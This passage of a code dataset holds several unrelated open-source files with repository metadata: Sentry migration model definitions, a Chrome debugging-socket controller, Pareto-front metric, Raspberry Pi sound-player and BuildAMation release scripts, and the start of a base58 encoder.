'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.reprocessingreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'ReprocessingReport'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'),)", 'object_name': 'SavedSearch'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.savedsearchuserdefault': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'SavedSearchUserDefault', 'db_table': "'sentry_savedsearch_userdefault'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'savedsearch': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.SavedSearch']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.scheduleddeletion': {
'Meta': {'unique_together': "(('app_label', 'model_name', 'object_id'),)", 'object_name': 'ScheduledDeletion'},
'aborted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 4, 20, 0, 0)'}),
'guid': ('django.db.models.fields.CharField', [], {'default': "'4ab522335c9c457fa7b0e2dd43273c35'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'object_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.scheduledjob': {
'Meta': {'object_name': 'ScheduledJob'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'payload': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.servicehook': {
'Meta': {'object_name': 'ServiceHook'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'8b4e9c643dd24b00b068654ee0ff4634471c8b810e234f96bce621e48c61df97'"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '512'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project_id', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project_id', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'", 'index_together': "(('project_id', 'key', 'last_seen'),)"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_password_expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_column': "'first_name'", 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'session_nonce': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useravatar': {
'Meta': {'object_name': 'UserAvatar'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'avatar'", 'unique': 'True', 'to': "orm['sentry.User']"})
},
'sentry.useremail': {
'Meta': {'unique_together': "(('user', 'email'),)", 'object_name': 'UserEmail'},
'date_hash_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'emails'", 'to': "orm['sentry.User']"}),
'validation_hash': ('django.db.models.fields.CharField', [], {'default': "u'v3MKTLoatafPf0YNZcPZiqcrK6rfsWTM'", 'max_length': '32'})
},
'sentry.userip': {
'Meta': {'unique_together': "(('user', 'ip_address'),)", 'object_name': 'UserIP'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'), ('user', 'organization', 'key'))", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.userpermission': {
'Meta': {'unique_together': "(('user', 'permission'),)", 'object_name': 'UserPermission'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'permission': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.userreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'UserReport', 'index_together': "(('project', 'event_id'), ('project', 'date_added'))"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']", 'null': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_user_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.versiondsymfile': {
'Meta': {'unique_together': "(('dsym_file', 'version', 'build'),)", 'object_name': 'VersionDSymFile'},
'build': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dsym_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.DSymApp']"}),
'dsym_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDSymFile']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '32'})
}
}
complete_apps = ['sentry']
|
bsd-3-clause
| 9,205,398,465,352,764,000
| 90.668459
| 233
| 0.580878
| false
| 3.886559
| false
| false
| false
|
micahjonas/python-2048-ai
|
chromectrl.py
|
1
|
3685
|
import urllib, urllib2, json, threading, itertools
try:
import websocket
except ImportError:
websocket = None
class ChromeDebuggerControl(object):
''' Control Chrome using the debugging socket.
Chrome must be launched using the --remote-debugging-port=<port> option for this to work! '''
def __init__(self, port):
if websocket is None:
raise NotImplementedError("websocket-client library not available; cannot control Chrome.\n"
"Please install it (pip install websocket-client) then try again.")
# Obtain the list of pages
pages = json.loads(urllib2.urlopen('http://localhost:%d/json/list' % port).read())
if len(pages) == 0:
raise Exception("No pages to attach to!")
elif len(pages) == 1:
page = pages[0]
else:
print "Select a page to attach to:"
for i, page in enumerate(pages):
print "%d) %s" % (i+1, page['title'].encode('unicode_escape'))
while 1:
try:
pageidx = int(raw_input("Selection? "))
page = pages[pageidx-1]
break
except Exception, e:
print "Invalid selection:", e
# Configure debugging websocket
wsurl = page['webSocketDebuggerUrl']
self.ws = websocket.create_connection(wsurl)
self.requests = {} # dictionary containing in-flight requests
self.results = {}
self.req_counter = itertools.count(1)
self.thread = threading.Thread(target=self._receive_thread)
self.thread.daemon = True
self.thread.start()
self._send_cmd_noresult('Runtime.enable')
def _receive_thread(self):
''' Continually read events and command results '''
while 1:
try:
message = json.loads(self.ws.recv())
if 'id' in message:
id = message['id']
event = self.requests.pop(id, None)
if event is not None:
self.results[id] = message
event.set()
except Exception as e:
break
def _send_cmd_noresult(self, method, **params):
''' Send a command and ignore the result. '''
id = next(self.req_counter)
out = {'id': id, 'method': method}
if params:
out['params'] = params
self.ws.send(json.dumps(out))
def _send_cmd(self, method, **params):
''' Send a command and wait for the result to be available. '''
id = next(self.req_counter)
out = {'id': id, 'method': method}
if params:
out['params'] = params
# Receive thread will signal us when the response is available
event = threading.Event()
self.requests[id] = event
self.ws.send(json.dumps(out))
event.wait()
resp = self.results.pop(id)
if 'error' in resp:
raise Exception("Command %s(%s) failed: %s (%d)" % (
method, ', '.join('%s=%r' % (k,v) for k,v in params.iteritems()), resp['error']['message'], resp['error']['code']))
return resp['result']
def execute(self, cmd):
resp = self._send_cmd('Runtime.evaluate', expression=cmd)
#if resp['wasThrown']:
# raise Exception("JS evaluation threw an error: %s" % resp['result']['description'])
result = resp['result']
if 'value' in result:
return result['value']
if 'description' in result:
return result['description']
return None
|
mit
| 258,010,317,988,155,460
| 36.222222
| 131
| 0.544369
| false
| 4.355792
| false
| false
| false
|
hpc-cecal-uy/pf_metrics
|
jmetal/pf_metrics.py
|
1
|
4208
|
# Copyright 2015 Renzo Massobrio
# Facultad de Ingenieria, UdelaR
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
############################################################################################################################
# INSTRUCTIONS
#
# Script to plot the global Pareto front and calculate generational distance, spread, spacing and relative hypervolume based
# on the pareto fronts output from jMetal (http://jmetal.sourceforge.net/).
#
# USAGE:
# python pf_metrics.py <path_to_results> <number_of_runs> <objective_1_name> <objective_2_name>
#
# To run the example:
# python pf_metrics.py example/ 5 obj1 obj2
#
# Notes:
# -<path_to_results> is the folder where the files "FUN.*" are located
# -<number_of_runs> is the amount of jobs executed. e.g.: if number_of_runs is 4 you should have FUN.0,...,FUN.3
# -<objective_J_name> is the label for the axis corresponding to objective J in the plot
#
# IMPORTANT: THIS SCRIPT ASSUMES MINIMIZATION OF BOTH OBJECTIVES. YOU SHOULD MODIFY THESE BEHAVIOUR TO FIT YOUR NEEDS.
#
# The metrics are calculated using the formulas in "Multiobjective optimization using Evolutionary Algorithms" from Kalyanmoy Deb.
# For the spread calculation, the euclidean distance is used.
#
# Hypervolumes are calculated using the code of Simon Wessing from TU Dortmund University found at:
# https://ls11-www.cs.uni-dortmund.de/rudolph/hypervolume/start
#
# Please feel free to contact me at: renzom@fing.edu.uy
#
############################################################################################################################
import sys
from os import path
sys.path.append('../libs')
import generic_pf_metrics
def load_jmetal_results(path_to_results, objectives, number_of_runs):
#Initialize dictionary to parse the pareto fronts
results = []
for run in range (0,number_of_runs):
results.append([])
for no in range(len(objectives)):
results[run].append([])
for run in range(0,number_of_runs):
path_to_file = path.join(path_to_results, "FUN.{0}".format(run))
with open(path_to_file) as f:
for line in f:
tokens = line.split()
for no in range(len(objectives)):
results[run][no].append(float(tokens[no]))
return results
####################################
########## MAIN ####################
def main():
ref_pf_file = None
normalize = None
if len(sys.argv) != 6 and len(sys.argv) != 7:
print("Not enough parameters. Usage:")
print(" - python {0} <path_to_results> <number_of_runs> <normalize> <obj1_name> <obj2_name>".format(sys.argv[0]))
print(" - python {0} <reference pf> <path_to_results> <number_of_runs> <normalize> <obj1_name> <obj2_name>".format(sys.argv[0]))
exit(-1)
else:
if len(sys.argv) == 6:
path_to_results = sys.argv[1]
number_of_runs = int(sys.argv[2])
normalize = sys.argv[3].strip().lower()
objectives = [sys.argv[4], sys.argv[5]]
else:
ref_pf_file = sys.argv[1]
path_to_results = sys.argv[2]
number_of_runs = int(sys.argv[3])
normalize = sys.argv[4].strip().lower()
objectives = [sys.argv[5], sys.argv[6]]
#Load the pareto fronts from the files
results = load_jmetal_results(path_to_results, objectives, number_of_runs)
generic_pf_metrics.compute(ref_pf_file, path_to_results, number_of_runs, objectives, results, normalize)
if __name__ == "__main__":
main()
|
gpl-3.0
| 1,158,768,144,247,686,000
| 38.327103
| 136
| 0.612643
| false
| 3.533165
| false
| false
| false
|
arnaudjuracek/py_suzanne
|
bak.run.py
|
1
|
1766
|
# ---------------------------
# py_suzanne 1.0
# Arnaud Juracek
# github.com/arnaudjuracek
import RPi.GPIO as GPIO
import glob, pygame, time, os, random
# --------------------------
# startup notification
print 'py_suzanne started'
os.system('omxplayer data/hello_world.aiff')
# --------------------------
# GPIO settings
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# --------------------------
# USB handling/mounting
usb = '/home/pi/Suzanne/usb/'
files = []
def getfile():
if not os.listdir(usb):
print 'getfile(): usb not mounted, mounting...'
for drive in glob.glob('/dev/sd*'):
os.system('sudo mount '+ drive + ' ' + usb +' -o uid=pi,gid=pi')
files = soundfiles(usb)
if len(files)>0:
file = random.choice(files)
print 'getfile(): '+ file +' selected'
return file
else:
print "getfile():error: couldn't get file : usb directory empty or not mounted correctly"
return 'data/error.mp3'
# -------------------------
# sound files filter
# see http://stackoverflow.com/a/4568638
def soundfiles(path):
ext = (path + '*.mp3', path + '*.wav')
sounds = []
for files in ext:
sounds.extend(glob.glob(files))
return sounds
# -------------------------
# instantiate pygame.mixer, player, etc
# see http://www.pygame.org/docs/ref/music.html#module-pygame.mixer.music
mixer = pygame.mixer
player = mixer.music
mixer.init()
# -------------------------
# lid open/close listenning
# see http://razzpisampler.oreilly.com/ch07.html
while True:
time.sleep(.5)
# GPIO.input(18) == False when 18 linked to GND
# GPIO.input(18) == True when 18 not linked to GND
if GPIO.input(18) == True:
if player.get_busy() == False:
player.load(getfile())
player.play()
else:
#player.fadeout(1000)
player.stop()
|
gpl-3.0
| 2,631,060,658,673,370,000
| 24.970588
| 91
| 0.610985
| false
| 2.92869
| false
| false
| false
|
markfinal/BuildAMation
|
codingtools/dotnetcore_make_release.py
|
1
|
10008
|
#!/usr/bin/python
from generate_docs import build_documentation
from generate_docs import NoDoxygenError
from optparse import OptionParser
import os
import platform
import shutil
import stat
import subprocess
import sys
import tarfile
import tempfile
import traceback
import zipfile
g_script_dir = os.path.dirname(os.path.realpath(__file__))
g_bam_dir = os.path.dirname(g_script_dir)
def log(msg):
print >>sys.stdout, msg
sys.stdout.flush()
def run_process(args):
try:
log('Running: %s' % ' '.join(args))
subprocess.check_call(args)
except OSError, e:
raise RuntimeError('Unable to run process "%s" because "%s"' % (' '.join(args), str(e)))
def _run_git(arguments):
args = []
args.append('git')
args.extend(arguments)
log('Running: %s' % ' '.join(args))
result = subprocess.check_output(args)
return result.rstrip()
def get_branch_name():
return _run_git(['rev-parse', '--abbrev-ref', 'HEAD'])
def get_hash():
return _run_git(['rev-parse', '--short', 'HEAD'])
def run_dotnet(target, project_path, source_dir, output_dir, configuration='Release', framework='netcoreapp2.1', force=True, standalone_platform=None, verbosity='normal', extra_properties=None):
output_dir = os.path.join(output_dir, 'bin', configuration, framework)
cur_dir = os.getcwd()
os.chdir(source_dir)
try:
args = []
args.append('dotnet')
args.append(target)
args.append(project_path)
args.append('-c')
args.append(configuration)
args.append('-f')
args.append(framework)
if force:
args.append('--force')
args.append('-o')
args.append(output_dir)
args.append('-v')
args.append(verbosity)
if standalone_platform:
args.append('--self-contained')
args.append('-r')
args.append(standalone_platform)
if extra_properties:
args.append(extra_properties)
run_process(args)
finally:
os.chdir(cur_dir)
def delete_directory(dir):
if os.path.isdir(dir):
log('Deleting folder, %s' % dir)
shutil.rmtree(dir)
def run_dotnet_publish(source_dir, build_dir, configuration='Release', framework='netcoreapp2.1', force=True, standalone_platform=None, verbosity='normal'):
delete_directory(build_dir)
os.makedirs(build_dir)
project = os.path.join(source_dir, 'Bam', 'Bam.csproj') # specifically build the Bam executable, so that the unit test dependencies don't get dragged in
run_dotnet('clean', project, source_dir, build_dir, configuration=configuration, framework=framework, force=False, standalone_platform=None, verbosity=verbosity)
run_dotnet('publish', project, source_dir, build_dir, configuration=configuration, framework=framework, force=force, standalone_platform=standalone_platform, verbosity=verbosity, extra_properties='/p:DebugType=None')
def copy_directory_to_directory(srcdir,destdir):
log('\tCopying directory ' + srcdir)
shutil.copytree(srcdir, destdir)
def copy_file_to_directory(srcfile,destdir):
log('\tCopying file ' + srcfile)
shutil.copy(srcfile, destdir)
def copy_support_files(source_dir, build_dir):
cur_dir = os.getcwd()
os.chdir(source_dir)
log('Copying support files from %s to %s ...' % (source_dir, build_dir))
try:
copy_directory_to_directory('packages', os.path.join(build_dir, 'packages'))
copy_directory_to_directory('tests', os.path.join(build_dir, 'tests'))
copy_file_to_directory('env.sh', build_dir)
copy_file_to_directory('env.bat', build_dir)
copy_file_to_directory('Changelog.txt', build_dir)
copy_file_to_directory('License.md', build_dir)
copy_file_to_directory('MS-PL.md', build_dir)
copy_file_to_directory('3rdPartyLicenses.md', build_dir)
finally:
os.chdir(cur_dir)
def list_files(base_dir):
log('Listing files in ' + base_dir)
starting_depth = base_dir.count(os.sep)
for root, dirs, files in os.walk(base_dir):
depth = root.count(os.sep) - starting_depth
log(' ' * depth + os.path.basename(root))
for f in files:
log(' ' * (depth + 1) + f)
def zip_dir(zip_path, dir):
log('Zipping directory %s to %s' % (dir, zip_path))
base_dir, leaf = os.path.split(dir)
cwd = os.getcwd()
try:
os.chdir(base_dir)
with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as zip_object:
for root, dirs, files in os.walk(leaf):
for file_path in files:
zip_object.write(os.path.join(root, file_path))
finally:
os.chdir(cwd)
def tar_dir(tar_path, dir):
def windows_executable_filter(tarinfo):
if platform.system() != "Windows":
return tarinfo
# attempt to fix up the permissions that are lost during tarring on Windows
if tarinfo.name.endswith(".exe") or\
tarinfo.name.endswith(".dll") or\
tarinfo.name.endswith(".py") or\
tarinfo.name.endswith(".sh") or\
tarinfo.name.endswith("bam"):
tarinfo.mode = stat.S_IRUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH
return tarinfo
log('Tarring directory %s to %s' % (dir, tar_path))
base_dir, leaf = os.path.split(dir)
cwd = os.getcwd()
try:
os.chdir(base_dir)
with tarfile.open(tar_path, "w:gz") as tar:
tar.add(leaf, filter=windows_executable_filter)
finally:
os.chdir(cwd)
def main(options, build_dir, source_dir):
_,bam_version_dir = os.path.split(build_dir)
if options.doxygen:
generated_docs_dir = os.path.join(source_dir, 'docs')
delete_directory(generated_docs_dir)
try:
build_documentation(source_dir, options.doxygen, False)
if options.make_distribution:
zip_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-docs' % bam_version_dir) + '.zip'), generated_docs_dir)
tar_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-docs' % bam_version_dir) + '.tgz'), generated_docs_dir)
except NoDoxygenError, e:
log(str(e)) # not fatal, but do complain
run_dotnet_publish(
source_dir,
build_dir,
configuration='Release',
framework='netcoreapp2.1',
force=True,
verbosity='normal'
)
copy_support_files(source_dir, build_dir)
#list_files(build_dir)
if options.make_distribution:
zip_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-AnyCPU' % bam_version_dir) + '.zip'), build_dir)
tar_dir(os.path.realpath(os.path.join(build_dir, '..', '%s-AnyCPU' % bam_version_dir) + '.tgz'), build_dir)
if options.standalone:
platforms = []
platforms.append('win-x64')
platforms.append('osx-x64')
platforms.append('linux-x64')
for platform in platforms:
platform_build_dir = build_dir + '-' + platform
run_dotnet_publish(
source_dir,
platform_build_dir,
configuration='Release',
framework='netcoreapp2.1',
force=True,
standalone_platform=platform
)
copy_support_files(platform_output_dir)
#list_files(platform_output_dir)
def clone_repo(checkout_dir, gittag):
args = [
"git",
"clone",
"--depth",
"1",
"--branch",
gittag,
"https://github.com/markfinal/BuildAMation.git",
checkout_dir
]
log('Running: %s' % ' '.join(args))
subprocess.check_call(args)
log('Cloning complete')
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-s', '--standalone', action='store_true', dest='standalone', help='Make builds specific to the current platform and standalone.')
parser.add_option('-d', '--doxygen', dest='doxygen', default=None, help='Location of the doxygen executable in order to generate documentation.')
parser.add_option('-t', '--tag', dest='gittag', default=None, help='Create a release from a named git tag. Clones at depth 1 from the named tag into a temporary directory.')
parser.add_option('-x', '--distribution', action='store_true', dest='make_distribution', help='Generate zip and tar archives for the build to distribute.')
parser.add_option('-l', '--local', action='store_true', dest='local', help='Builds the local checkout into a bam_publish subdirectory')
parser.add_option('-c', '--clean', action='store_true', dest='cleanup', help='Clean up any intermediate temporary folders created at the end of a successful build.')
(options, args) = parser.parse_args()
temp_dir = tempfile.mkdtemp()
if options.gittag:
# for some reason, cloning into a temporary folder (at least on macOS), causes the build
# not to fail, but to generate an invalid set of assemblies
# the Bam.dll won't run with dotnet, and the schema is in the wrong place, for starters
source_dir = os.path.realpath(os.path.join(g_bam_dir, '..', "BuildAMation-%s-src" % options.gittag))
build_dir = os.path.join(temp_dir, "BuildAMation-%s" % options.gittag)
clone_repo(source_dir, options.gittag)
elif options.local:
source_dir = g_bam_dir
build_dir = os.path.join(source_dir, 'bam_publish')
else:
source_dir = g_bam_dir
branch = get_branch_name()
hash = get_hash()
build_dir = os.path.join(temp_dir, "BuildAMation-%s-%s" % (hash,branch))
try:
main(options, build_dir, source_dir)
# remove cloned checkout directory
if options.gittag and options.cleanup:
delete_directory(source_dir)
except Exception, e:
log('*** Failure reason: %s' % str(e))
log(traceback.format_exc())
finally:
pass
log('Done')
|
bsd-3-clause
| 2,779,776,771,498,325,000
| 36.066667
| 220
| 0.624201
| false
| 3.565372
| true
| false
| false
|
Unthinkingbit/bitcointools
|
base58.py
|
1
|
3506
|
#!/usr/bin/env python
"""encode/decode base58 in the same way that Bitcoin does"""
import hashlib
import math
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
getNewRIPEMD160 = None
getNewSHA256 = None
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
